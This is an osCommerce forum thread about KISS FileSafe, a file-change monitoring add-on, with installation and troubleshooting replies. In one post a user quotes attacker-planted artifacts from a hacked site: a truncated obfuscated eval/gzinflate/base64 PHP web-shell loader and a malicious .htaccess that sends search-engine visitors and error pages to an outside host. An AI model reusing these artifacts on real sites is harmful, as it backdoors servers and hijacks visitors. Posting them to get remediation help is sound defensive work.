Jump to content
Latest News: (loading..)
FWR Media

[contribution] KISS FileSafe ( file security )

Recommended Posts

KISS FileSafe by FWR Media

 

Requirements: PHP 5.2+

Compatibility: osCommerce all versions

PHP 5.3 compatible

 

Credits: Thanks to the beta testers who's valuable time and effort assisted greatly:

ken44

jwilkins

burt

 

What is KISS FileSafe? ( KISS means Keep It Simple Stupid! )

 

There are many posts in the osCommerce forums about "being hacked", whether the intrusion was via the server or via a security hole in your specific application most often it ends up with your files being modified to suit a hacking purpose.

This could just be a simple defacement or could be the critical stealing of private customer information, either way it is undesireable and needs to be managed.

 

KISS FileSafe is a simple but effective script which will inform you if and when a file is introduced to your application or an existing file is modified giving you the opportunity to deal with the problem early armed with the knowledge of the actual files in question and their location.

 

Disclaimer: KISS FileSafe does NOT stop your application from being hacked it informs you of newly introduced or modified files allowing you take prompt and informed action. Also of course it let's you know that nothing has happened to your files providing peace of mind.

 

Installation couldn't be simpler .. no admin settings .. no file changes .. simply upload the files .. set a cron job and you're done.

There are other scripts that do this type of thing

 

Yes there are, and some are extremely complex. Some are even trying to emulate an anti virus system.

Let's be frank here, security at the code level must be a simple process, ideally taking a whitelist approach. The only bodies able to take an effective blacklist approach to hacking vectors are professional organisations like Emsisoft/Ikarus.

It is impossible to cover the constantly changing hacking vectors and to attempt to do so with little knowledge is more dangerous than helpful so what this script does is the necessary basics following the below simple reasoning: -

 

1) KISS FileSafe reports that a new file has been added.

 

My Question to Me: Did I add it?

Answer Yes: - Ok all is well.

My Reaction: I shall reset the KISS FileSafe system which will then accept this new file as safe.

Answer N0 I DIDN'T: - all may not be well.

My Reaction: I shall download the file and check it, if there is no valid reason for the file to exist I will delete it and ask my hosts to look at the file and check how it got there. If it had a valid reason to be there e.g. a cache file or something I may add the directory to the ignore list.

 

2) KISS FileSafe reports that an existing file has been modified.

 

My Question to Me: Did I modify it?

Answer Yes: - Ok all is well.

My Reaction: I shall reset the KISS FileSafe system which will then accept this modified file as safe.

Answer N0 I DIDN'T: - all may not be well.

My Reaction: I shall download the file and check it against my last backup.

If it looks worrying I will overwrite the file with my backup ask my hosts to look at the file and check how it was modified. If it turns out to be a constantly changing valid file e.g. errors.txt or something I will consider adding the file to the ignore_files list.

 

How will I know it is working?

 

Every time KISS FileSafe runs it will send a run report via email .. this will look like : -

 

File count: 1366

KISS FileSafe ran for: 0.12 seconds

KISS FileSafe paused 0 time(s) to unload server for a total of 0 seconds

Actual parse time: 0.12 seconds

KISS FileSafe Identified Unknown Files:

None

KISS FileSafe Identified Modified Files:

None

How can I test it?

 

1) Add a new file to your system - hacktest.php or something.

2) Download an existing file then re upload it again ( changes the last modified time ).

3) Force the system to run by browsing to filesafe.php adding the authentication password .. like ..

www.mysite.com/catalog/filesafe.php?auth=my_password ( where my_password is what you set authentication_value to in kiss_filesafe.ini ).

This will force the system to run a check and you should get a run report and an "identified" report which will have identified the new and the modified file.

 

Documentation for developers:

 

phpDocumentor for KISS FileSafe

 

Recommended Additional Security Measures:

 

Protect your querystring from attacks by installing Security Pro ( find it in osCommerce addons ).

 

Download KISS FileSafe:

 

osCommerce addons: KISS FileSafe

Edited by FWR Media

Share this post


Link to post
Share on other sites

Hello, I plan to install this add on: couple of questions for you.

 

I have SiteMonitor installed, from what it appears to me I can install KISS FileSafe ( file security ) with no conflicts. Do I have that correct? KISS FileSafe ( file security ) appears to me to replace SiteMonitor, but I'd like to test things out before removing anything.

 

Secondly, I am with a host that is a bit of a PITA with CronJobs (I plan to switch hosts at the end of the year). They only allow a CronJob to be run by running a file, not by code. Example

 

'http://myusername.myhost.com/filetruncronjob.php'

 

That's the only way to run CronJob on my host.

 

Question: Give that, do you think the following syntax work with my sever's system?

 

'http://myusername.myhost.com/filesafe.php?auth=myauthcode'

 

Thank much for your contributions and help here on osC.


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

Hello, I plan to install this add on: couple of questions for you.

 

I have SiteMonitor installed, from what it appears to me I can install KISS FileSafe ( file security ) with no conflicts. Do I have that correct? KISS FileSafe ( file security ) appears to me to replace SiteMonitor, but I'd like to test things out before removing anything.

 

Secondly, I am with a host that is a bit of a PITA with CronJobs (I plan to switch hosts at the end of the year). They only allow a CronJob to be run by running a file, not by code. Example

 

'http://myusername.myhost.com/filetruncronjob.php'

 

That's the only way to run CronJob on my host.

 

Question: Give that, do you think the following syntax work with my sever's system?

 

'http://myusername.myhost.com/filesafe.php?auth=myauthcode'

 

Thank much for your contributions and help here on osC.

 

Hi

 

KISS FileSafe conflicts with nothing as it doesn't touch a single osCommerce file nor the osCommerce database. ( unless you add the optional code to application_bottom.php - not recommended ).

 

'http://myusername.myhost.com/filesafe.php?auth=myauthcode' should be perfect as it is obviously accessing the file via HTTP.

Share this post


Link to post
Share on other sites

I get this warning:

 

Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /...../...../...../catalog/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 379


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

I get this warning:

 

Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /...../...../...../catalog/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 379

 

safe mode is deprecated as of PHP 5.3.0 ( as it's ridiculous ) so i have written the code without safe mode in mind.

 

You would have to open up includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php

 

Find ..

	set_time_limit( $this->script_time_limit );

 

and change to ..

 

 	//set_time_limit( $this->script_time_limit );

 

Also in kiss_filesafe.ini change the settings ..

 

sleep_time = 1

allowed_time_before_sleep = 1

 

Basically because of your hosts settings we cannot safeguard server load. Also if the script times out there's nothing we can do about it.

Edited by FWR Media

Share this post


Link to post
Share on other sites

and change to ..

 

 	//set_time_limit( $this->script_time_limit );

I tried this before you answered and it worked.. wink.gif

 

Also in kiss_filesafe.ini change the settings ..

 

sleep_time = 1

allowed_time_before_sleep = 1

 

It worked without changing this, but I will try that too..


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

I tried this before you answered and it worked.. wink.gif

 

 

 

It worked without changing this, but I will try that too..

 

The reasons I changed those two is that it is possible for the script to time out if the sleep time is too long. as standard it works for 0.5 seconds then sleeps for 2 seconds. So let's say for example the script left to it's own devices without sleeping would have worked for 5 seconds .. it would have ..

 

worked for 5 seconds .. slept 10 times for 2 seconds

 

Which is a total of 25 seconds approaching the standard time out time of 30 seconds.

Share this post


Link to post
Share on other sites

@sijo

 

Could you run this line for me on your server please? and let me know the result. ( although the result should be obvious )

 

<?php
echo ini_get( 'safe_mode' ) ? 'Safe mode on' : 'Safe mode off';
?>

Edited by FWR Media

Share this post


Link to post
Share on other sites

@sijo

 

Could you run this line for me on your server please? and let me know the result. ( although the result should be obvious )

 

<?php
echo ini_get( 'safe_mode' ) ? 'Safe mode on' : 'Safe mode off';
?>

 

Safe mode on (tested on both my sites)


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

Safe mode on (tested on both my sites)

 

Ok thanks

 

The corrected method should therefore be ..

 

	/**
* Pause the script to prevent server load
* 
* @uses sleep() to pause the script
* @uses set_time_limit() to reset the script time limit
* @uses ini_get() checks for safe mode where set_time_limit() will not work
* @param string $iteration_time - UNIX timestamp of current time iterating between sleeps
* @param int $script_slept - amount of time the script has currently splept in between iterations
* @access protected
* @return void
*/
protected function serverUnload( &$iteration_time, &$script_slept ) {
	// Stop server overloading
	if ( ( microtime( true ) - $iteration_time ) >= $this->allowed_time_before_sleep ) {
	sleep( $this->sleep_time );
	$script_slept += $this->sleep_time;
	ini_get( 'safe_mode' ) ? null : set_time_limit( $this->script_time_limit );
	$iteration_time = microtime( true );
	}
}

Share this post


Link to post
Share on other sites

Ok thanks

 

The corrected method should therefore be ..

 

Tried this with and without the changes made in the .ini file, both works..

 

Another thing. Im getting two emails every time I run the script with this subjects:

Kiss FileSafe Runtime Report

URGENT! Kiss FileSafe Has Identified Files

Is this the way it should be?


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

Tried this with and without the changes made in the .ini file, both works..

 

Another thing. Im getting two emails every time I run the script with this subjects:

Kiss FileSafe Runtime Report

URGENT! Kiss FileSafe Has Identified Files

Is this the way it should be?

 

Depends .. after first load you should only get the run time report .. but if you added or modified a file ..

 

See documentation/usage.html

 

The bit titled: Resetting KISS FileSafe

Share this post


Link to post
Share on other sites

For those who have already downloaded this .. the package has changed slightly.

 

Please download the current package replacing the kiss_filesafe directory.

 

Note: the kiss_filesafe directory should no longer be writeable .. a new directory has been added within it named "data" this directory should be writeable.

Share this post


Link to post
Share on other sites

For those who have already downloaded this .. the package has changed slightly.

 

Please download the current package replacing the kiss_filesafe directory.

 

Note: the kiss_filesafe directory should no longer be writeable .. a new directory has been added within it named "data" this directory should be writeable.

 

 

Works ok..


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

Thank you for another great contribution, I'm just about to install it on friend's web site. May I ask what is the difference between this and SiteMonitor?

 

Also, since you've mentioned extra protection for writable directories, maybe you would have a solution to the following problem:

 

Friend's site was hacked... they've uploaded several files to all writable directories of the web site. It seems that files have identical content and various filenames such as spill.php, spool.php or sql.php. This is a small preview of those files:

<? eval(gzinflate(base64_decode('DZfHDsTGEUR/xTdJ4IE5wZYFcplzWqaLwZxz5td7D32c6cGg6nX1P//9zz//Ks6k/7N6m7Hsk734M022gsD+lxfZlBd//sHFBbptAZN9DfCOkS7KBD2csD3B6/cdLurl+rFc4fJ0A4YBbhA8818ZJR5/TZB4wHxZRPrTgkPik27AgT7u4aHigaBc2AKjQjPqHcddIBNTflVwsk2pp9LyFS9gGVHI8aNw1G/2SapZF6qaUqu14drNMKrjEGXi3KZgERz+/CachCmy5fu6LnTT8qnvdnZr/OJR/ZGcJH6PPJRVn/Lqpph4bjI70sbJWuZJYFcLr5iDoN9IMSDwAVKL3qh2z2hsSxeVYuywg/weFvlFGp16ItXYntOIHOyIDc2RgFZyDKJUfU8ZDSu86FUYRX7T/KFdm73bC7LWl5alFhS8Pgq3FEBkGwrnaQqmeE014izZSQ0pLx6U5KkpyXEN9Q4R... etc. etc.

 

We've noticed quite quickly and deleted those files and added .htaccess as per your instructions. We've also changed CHMOD to 757 because 775 was throwing errors. Few minutes after changing the permissions, I've noticed that new .htaccess files were uploaded to all of those directories so I've deleted them. Setting permissions to 757 is obviously no solution and I have also changed the ftp password - however there was no hacker trace in the ftp log. Their .htaccess was:

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR] 
RewriteCond %{HTTP_REFERER} .*ask.* [OR] 
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] 
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR] 
RewriteCond %{HTTP_REFERER} .*msn.* [OR] 
RewriteCond %{HTTP_REFERER} .*netscape.* [OR] 
RewriteCond %{HTTP_REFERER} .*aol.* [OR] 
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] 
RewriteCond %{HTTP_REFERER} .*goto.* [OR] 
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] 
RewriteCond %{HTTP_REFERER} .*mamma.* [OR] 
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] 
RewriteCond %{HTTP_REFERER} .*lycos.* [OR] 
RewriteCond %{HTTP_REFERER} .*search.* [OR] 
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* 
RewriteRule ^(.*)$ http://lincau.osa.pl/se/ [R=301,L]

ErrorDocument 401 http://lincau.osa.pl/se/
ErrorDocument 403 http://lincau.osa.pl/se/
ErrorDocument 404 http://lincau.osa.pl/se/
ErrorDocument 500 http://lincau.osa.pl/se/

 

Would you have a solution to the above please? As far as I can tell, files have bee patched and many security contributions are in place.


Absinthe Original Liquor Store

Share this post


Link to post
Share on other sites

Thank you for another great contribution, I'm just about to install it on friend's web site. May I ask what is the difference between this and SiteMonitor?

 

Also, since you've mentioned extra protection for writable directories, maybe you would have a solution to the following problem:

 

Friend's site was hacked... they've uploaded several files to all writable directories of the web site. It seems that files have identical content and various filenames such as spill.php, spool.php or sql.php.

 

Would you have a solution to the above please? As far as I can tell, files have bee patched and many security contributions are in place.

 

Obviously I'm not privvy to all the files in your osCommerce installation so can't be certain but probably you are on shared hosting and the server has been hacked .. the hacker is probably in a position to upload these files to any writeable directory on the server.

 

Your hosts should examine the logs to ascertain how the files are being placed.

 

Re: how this compares to other contributions - this does what it states "on the tin" no more and no less. I was asked to provide this for a paying client and having looked at the available offerings it looked preferable to develop this rather than install what was currently available, users can make their own judgements.

 

I believe that having been hacked the ONLY solution is to upload a full backup from before the hack .. scripts that are attempting to identify hack code at at best flawed and at worst downright dangerous. Equally if you install KISS FileSafe over hacked files then it too will be useless as the hacked files will have been declared "safe".

Edited by FWR Media

Share this post


Link to post
Share on other sites

After browsing to filesafe.php these errors appeared:

 

Warning: Kiss_FileSafe_Abstract::moduleAccess cannot write to the module directory [PATH]includes/modules/kiss_filesafe/data, this will have to be done manually in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 186

Warning: file_put_contents(/home/xxx/public_html/includes/modules/kiss_filesafe/data/files_data.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 251

Warning: file_put_contents(/home/xxx/public_html/includes/modules/kiss_filesafe/data/runtime.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 256

 

Any idea please?


Absinthe Original Liquor Store

Share this post


Link to post
Share on other sites

After browsing to filesafe.php these errors appeared:

 

Warning: Kiss_FileSafe_Abstract::moduleAccess cannot write to the module directory [PATH]includes/modules/kiss_filesafe/data, this will have to be done manually in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 186

Warning: file_put_contents(/home/xxx/public_html/includes/modules/kiss_filesafe/data/files_data.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 251

Warning: file_put_contents(/home/xxx/public_html/includes/modules/kiss_filesafe/data/runtime.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 256

 

Any idea please?

 

Yes .. please read the instructions before posting here.

Share this post


Link to post
Share on other sites

And for those facing the same warning...

 

Just make sure that the directory data (/includes/modules/kiss_filesafe/data) is writable.

 

P.S.

The correct answer was just two words longer, that should not hurt Rob! Have you ever not overlooked something by yourself?


Absinthe Original Liquor Store

Share this post


Link to post
Share on other sites

And for those facing the same warning...

 

Just make sure that the directory data (/includes/modules/kiss_filesafe/data) is writable.

 

P.S.

The correct answer was just two words longer, that should not hurt Rob! Have you ever not overlooked something by yourself?

 

The correct answer was what I said.

 

I take the time to build the contribution and I take the time to write clear instructions.

 

In the case of this the install points are: -

 

  • Upload the files.
  • Set your settings
  • Set a cron job ( optional ).
  • Ensure that the data directory is writeable.
  • Run for the first time.

No I am not going to answer questions that are in those 5 points because it is unreasonable.

Edited by FWR Media

Share this post


Link to post
Share on other sites

Hi, firstly thank you for this great contribution (as well as your other many great contributions), i am using it and will continue to do so.

However i think i may have found a slight problem with the workflow and just wondered what your thoughts where.

 

As an example this is my understanding of how this works (i may be completely wrong)

 

9:00 I modify application_top

10:00 Filessafe cron job runs and sends out the email

10:05 I read the email, 1 file modified (application_top) at 9:00, i know this was me so i reset the cache.

 

Now imagine this

9:00 I modify application_top

10:00 Filessafe cron job runs and sends out the email

10:01 Malicious code is added to index.php

10:05 I read the email, 1 file modified (application_top) at 9:00, i know this was me so i reset the cache.

 

have i just told filesafe that all files are fine as i was unaware of the changes made between the cron job running and me resetting the cache?


Scott

Share this post


Link to post
Share on other sites

i think some files in this contribution are infected!

 

Don't talk rubbish!

Share this post


Link to post
Share on other sites

i try install it and my htaccess file was changed and my index page redirected .

 

Firstly this contribution does not change your root .htaccess ( or any .htaccess although it has a few in the module directory ), secondly it redirects nothing.

 

Accusing contributions of adding "infected" files is a serious business, before making such accusations please try to have a clue what you are talking about.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×